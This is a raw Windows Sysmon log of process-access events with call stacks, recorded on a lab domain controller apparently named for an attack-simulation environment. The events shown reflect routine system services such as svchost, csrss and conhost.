13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005256Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005255Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2801-00000000A301}3968C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.143{59A5CD1D-8E46-6005-1600-00000000A301}15442108C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2801-00000000A301}3968C:\Windows\system32\speech_onecore\common\SpeechModelDownload.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\UBPM.dll+ac60|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.127{59A5CD1D-90A0-6005-2701-00000000A301}13404424C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2601-00000000A301}804C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2701-00000000A301}1340C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2601-00000000A301}804C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-1600-00000000A301}15442408C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2601-00000000A301}804C:\Windows\System32\XblGameSaveTask.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+36c9|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.112{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.096{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-90A0-6005-2401-00000000A301}3664C:\Windows\system32\usoclient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.096{59A5CD1D-90A0-6005-2501-00000000A301}41004108C:\Windows\system32\conhost.exe{59A5CD1D-90A0-6005-2401-00000000A301}3664C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-90A0-6005-2501-00000000A301}4100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:44:00.081{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 